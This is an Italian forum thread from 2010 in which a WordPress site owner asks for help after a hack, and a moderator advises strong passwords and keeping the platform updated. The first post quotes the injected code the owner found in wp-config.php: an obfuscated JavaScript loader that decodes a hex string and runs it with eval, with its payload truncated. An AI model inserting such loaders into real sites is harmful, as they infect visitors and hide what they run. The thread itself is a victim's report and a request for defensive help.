|
|||||||
|
|
|
![]() |
|
|
Strumenti |
|
|
#1 |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
Sito attaccato da hacker: che fare?
ciao,
ho un sito su piattaforma Wordpress che gestisco e ho scoperto che sono stato vittima di hackers. Non potevo più accedervi a ricevevo un messaggio che diceva: Parse error: syntax error, unexpected '<' in /home/mhd-01/wwww.xxxxx-yyyyyy.com/htdocs/wp-config.php on line 93. Via FTP ho controllato il file wp-config.php ed ho trovato questo script: <script type='text/javascript'> var t="";var arr="646f63756d656e742e...2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t); </script> L'ho cancellato e sono riuscito a visualizzare di nuovo il mio sito ma il pannello di controllo di Wordpress presenta ancora dei problemi, lo visualizzo male, con una grafica sconclusionata per cui credo che il problema non sia risolto. Ho effettuato la procedura di pulizia indicata qui e, log di hijackthis a parte da analizzare, non mi pare ci sia nulla di particolare nel mio pc. O meglio, prima Antivir mi ha rilevato un Trojan che è stato però eliminato adesso. Se però il mio pc fosse davvero pulito ora credo che dovrei visualizzare il pannello di controllo di Wordpress correttamente e invece non è così. Esiste un modo per vedere se nel mio sito è stato inserito qualche altro script da altre parti? Esiste qualche programma per analizzare il mio sito nello specifico invece che il mio pc? Grazie in anticipo, ciao! P.S. Il servizio assistenza del mio hosting mi ha risposto così: "probabilmente ha qualche script nel sito che ha dei BUG che hanno consentito la modifica della pagina. Consigliamo di fare controlli in tal senso." Appunto, come posso fare controlli in tal senso?? Ultima modifica di Fab_DM : 11-10-2010 alle 18:16. |
|
|
|
|
|
#2 |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Ciao, sistema il tuo post sballa il layout del forum e riporta l'indirizzo del sito in modo e maniera che non sia cliccabile, grazie.
__________________
Try again and you will be luckier.
|
|
|
|
|
|
#3 |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
|
|
|
|
|
|
#4 |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Tutto ok, ma hai dimenticato di riportare il sito.
__________________
Try again and you will be luckier.
|
|
|
|
|
|
#5 |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
ah no, l'ho eliminato apposta pensando che non si potesse postare!
Anche perchè pensavo bastasse postare lo script fondamentalmente. Il sito è wwww.health-bodytips.com L'ho reso non cliccabile, fammi sapere se va bene così! Grazie! edit. ho appena riscontrato lo stesso problema in un altro sito che ho e usavo come prova. Siccome ho anche altri siti oltre a questi 2, notavo il fatto che, per ora, ho riscontrato questo problema con 2 blog Wordpress che hanno lo stesso hosting service. Un altro blog Wordpress che ho, con un altro hosting, per ora non presenta alcun problema di questo tipo. Non so se c'entri l'hosting comunque ma volevo riportarlo. Spero che qualcuno mi sappia dare una mano a capire Ultima modifica di Fab_DM : 12-10-2010 alle 01:59. |
|
|
|
|
|
#6 |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
nessuno ha mai avuto problemi di questo tipo?
|
|
|
|
|
|
#7 |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Ciao, controllato ieri, non ho visto nulla di anomalo.
__________________
Try again and you will be luckier.
|
|
|
|
|
|
#8 |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
Ciao, grazie per la risposta!
Purtoppo il pannello di controllo del sito (wordpress) ha una grafica completamente sballata per cui penso ci sia ancora qualcosa che non va. Ho scoperto che anche un altro blog che ho è stato attaccato ma questo sembra irrecuperabile. Se hai voglia di dargli uno sguardo è wwww.ioinformo.it. Non riesco più ad accedere grazie, ciao! |
|
|
|
|
|
#9 | |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Quote:
__________________
Try again and you will be luckier.
Ultima modifica di Chill-Out : 14-10-2010 alle 00:09. |
|
|
|
|
|
|
#10 | |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
Quote:
Ho sovrascritto tutti i file tranne la cartella content e il file config.php. Risultato: tutto come prima. Ed ogni volta che vi accedo il mio antivirus mi blocca un trojan... Ma c'è un modo per fare una scansione antivirus al mio sito?? |
|
|
|
|
|
|
#11 |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Mi alleghi il log su uno dei Server remoti indicati nelle Regole di sezione in firma.
__________________
Try again and you will be luckier.
|
|
|
|
|
|
#12 |
|
Senior Member
Iscritto dal: Jul 2005
Città: Firenze
Messaggi: 3598
|
edit
|
|
|
|
|
|
#13 | |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
Quote:
Grazie in anticipo! antivir.jpg antivir_1.png |
|
|
|
|
|
|
#14 | |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Quote:
__________________
Try again and you will be luckier.
|
|
|
|
|
|
|
#15 |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
sì questi sono stati rilevati connettendomi alla homepage health-bodytips prima e al pannello admin di wordpress poi.
Per conoscenza, mi è successo in alcuni casi di ricevere gli stessi avvisi connettendomi anche all'altro sito. |
|
|
|
|
|
#16 |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
nessuna novità?
Se cancello tutto via ftp e ricomincio il lavoro da zero, sono sicuro di aver tolto i virus? Esiste un modo per evitare che qualcuno infili script nelle pagine dei siti internet? Grazie |
|
|
|
|
|
#17 |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Ricontrollato, non risulta nulla, per evitare tutto eventuali iniezioni di codice i principali accordimenti sono, password robusta e piattaforma sempre aggiornata.
__________________
Try again and you will be luckier.
|
|
|
|
|
|
#18 | |
|
Member
Iscritto dal: Dec 2009
Messaggi: 30
|
Quote:
Un'ultima cosa, c'è un modo in cui possa eventualmente fare io dei controlli in futuro per essere sicuro che nessuno si sia infilato nel mio sito? Giusto per non disturbarvi sempre nel forum, ogni volta che avessi un dubbio riguardo questo problema su uno dei miei siti. Grazie ancora! |
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 19:31.




















